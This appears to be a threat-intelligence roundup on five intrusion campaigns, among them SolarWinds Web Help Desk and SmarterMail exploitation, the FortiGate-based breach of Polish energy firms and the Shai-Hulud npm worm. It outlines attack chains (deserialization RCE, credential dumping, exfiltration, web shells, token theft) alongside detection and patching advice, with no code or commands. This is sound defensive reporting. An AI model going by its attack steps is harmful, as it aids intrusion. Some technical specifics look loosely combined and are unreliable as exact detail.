SolarWinds Web Help Desk Exploited in Multi-Stage Attacks
Microsoft has disclosed a sophisticated multi-stage intrusion campaign where threat actors exploited internet-exposed SolarWinds Web Help Desk instances to achieve remote code execution, enabling initial access and subsequent lateral movement to high-value network assets. This vulnerability, tracked as CVE-2025-40551, was added to CISA’s Known Exploited Vulnerabilities catalog, with federal agencies mandated to patch by February 6, 2026.
Technical Details of the Vulnerability
The core flaw in SolarWinds Web Help Desk resides in inadequate input validation and sanitization within the application’s web interface, specifically in the handling of user-supplied parameters during ticket creation and management workflows. Attackers craft malicious HTTP requests that inject serialized objects or command payloads into vulnerable endpoints, such as /app/tickets or administrative panels. Upon deserialization on the server side, these payloads trigger arbitrary code execution within the context of the WHD service account, often running with elevated privileges on Windows servers.
Exploitation requires no authentication due to misconfigured exposure of admin interfaces, allowing unauthenticated remote code execution. Post-exploitation, actors deploy persistence mechanisms including scheduled tasks and registry run keys to maintain foothold. The attack chain escalates through credential dumping using tools like Mimikatz, followed by Kerberos ticket forging for pass-the-ticket attacks across domain-joined systems.
Observed Attack Tactics and Infrastructure
In a February 7, 2026 incident investigated by Huntress, attackers rapidly established persistence post-RCE by deploying Zoho Meetings for remote access and Cloudflare tunnels to mask C2 communications. Notably, Velociraptor, a legitimate open-source forensics and incident response tool, was repurposed for C2 operations, leveraging its DFIR capabilities to enumerate endpoints, harvest credentials, and exfiltrate data undetected.
Tactics mirror advanced persistent threat behaviors: initial beaconing via HTTPS to compromised domains, followed by deployment of Cobalt Strike beacons for lateral movement. Attackers enumerated Active Directory using BloodHound, targeting domain controllers and privileged service accounts. Data staging occurred in encrypted ZIP archives uploaded via legitimate cloud services, evading network security monitoring.
Mitigation and Detection Strategies
Organizations must audit exposed WHD instances using Shodan or Censys for internet-facing deployments, enforcing network segmentation and zero-trust access controls. Apply patches from SolarWinds immediately, and implement web application firewalls with rules blocking deserialization attempts and anomalous parameter lengths. Detection signatures include monitoring for Velociraptor processes on non-IR endpoints, unusual Cloudflare WARP traffic from servers, and Zoho API calls from internal IPs.
Enable comprehensive logging of IIS requests, focusing on POSTs to /HelpDesk/UI/ endpoints with base64-encoded payloads. Behavioral analytics should flag rapid deployment of tunneling tools post-logon, combined with forensics tool execution outside standard IR playbooks.
SmarterMail CVE-2026-24423 Fuels Ransomware Campaigns
CISA has warned of active exploitation of CVE-2026-24423, a critical unauthenticated remote code execution vulnerability in SmarterTools’ SmarterMail, actively weaponized in ransomware attacks, leading to its inclusion in the Known Exploited Vulnerabilities catalog.
Vulnerability Mechanics
The vulnerability stems from a deserialization flaw in SmarterMail’s messaging API, where unsanitized XML or SOAP inputs to endpoints like /Services/SmarterMail.asmx trigger unsafe object deserialization. Attackers supply gadget chains exploiting .NET TypeConfuseDelegate or similar primitives, achieving RCE without credentials by chaining to system shells via Process.Start invocations.
Affected versions range from 16.x to 18.x, with the flaw exploitable over HTTP/HTTPS on port 8090 or custom ports. Proof-of-concept exploits automate payload generation, encoding commands in XML External Entities (XXE) to bypass WAFs.
Ransomware Deployment Tactics
Post-exploitation, ransomware groups like those behind LockBit variants deploy loaders that enumerate shares, encrypt volumes using AES-256 with RSA-4096 key exchange, and drop ransom notes. Attackers exfiltrate data via Rclone to MEGA or OnionShare prior to encryption, following double-extortion models. Persistence includes WMI event subscriptions and Golden SAML ticket forging for cloud-synced environments.
Defensive Posture Recommendations
Patch to SmarterMail 19.4 or later, disable unnecessary web services, and restrict firewall rules to authenticated management IPs. Deploy EDR rules detecting deserialization libraries like YSOSerial.exe artifacts, anomalous PowerShell invocations from mail servers, and SMB enumeration spikes. Network segmentation isolating mail servers from domain controllers prevents lateral spread.
Polish Energy Sector Breached by Static Tundra via FortiGate VPN
Russian-linked Static Tundra (Berserk Bear) exploited default credentials on exposed Fortinet FortiGate VPNs to breach Poland’s energy sector, deploying DynoWiper malware for data destruction, though EDR largely mitigated impacts without grid disruption.
Attack Vector and Initial Access
Actors targeted FortiGate SSL VPN portals using unchanged admin/admin credentials, common in misconfigured OT environments. Post-authentication, they exploited SSL VPN plugin vulnerabilities for shell access, injecting web shells into /flash/scripts/ for persistent backdoor.
Malware Analysis: DynoWiper
DynoWiper, a wiper variant akin to NotPetya, overwrites MBR, encrypts files with RC4 streams, and propagates via SMB EternalBlue and RDP. It targets ICS protocols like Modbus and OPC UA, corrupting PLC configurations. Self-propagation uses stolen NTLM hashes for pass-the-hash across segmented networks.
Impact and Response
While EDR blocked full deployment, damaged ICS endpoints required forensic rebuilds. CERT Polska attributes to FSB via TTP overlaps like custom PowerShell droppers and Living-off-the-Land techniques using certutil and bitsadmin.
Hardening Critical Infrastructure
Mandate MFA on all remote access, rotate defaults via automation, and segment OT networks with data diodes. Hunt for indicators like FortiGate logins from Russian VPS IPs and DynoWiper mutexes (DynoWiperGlobal).
DKnife Toolkit Enables Router Hijacking for Espionage
China-nexus actors deploy DKnife, a Linux toolkit for router compromise, facilitating adversary-in-the-middle attacks to hijack traffic and deliver ShadowPad backdoors since 2019, targeting Chinese-speaking users.
Toolkit Capabilities
DKnife installs iptables rules for traffic redirection, DNS poisoning via hosts file mods, and rootkit hiding with LD_PRELOAD hooks. It proxies HTTP/S to C2, injecting JS into updates for Android APKs and Windows EXEs.
Operational Overlaps
Infrastructure links to Spellbinder, sharing C2 domains and payloads like DarkNimbus RAT for keylogging and screen capture.
Detection and Mitigation
Monitor for rogue iptables chains, DNS query anomalies to attacker domains, and unexpected root processes. Patch routers, enforce certificate pinning, and use DNSSEC.
Shai-Hulud Worm Ravages npm Supply Chain
The self-propagating Shai-Hulud worm compromises npm packages, stealing tokens to poison 500+ repositories, exfiltrating credentials and deploying dead man’s switches.
Propagation Mechanism
Infects via malicious postinstall scripts stealing npmrc tokens, republishing victim packages with backdoors. Targets CI/CD by injecting into GitHub Actions workflows.
Exfiltration and Impact
Harvests AWS/GCP/Azure keys to GitHub gists. Dead man’s switch wipes via shred on C2 takedown.
Supply Chain Defenses
Implement token rotation, SBOM scanning with Sigstore, and quarantine unverified packages.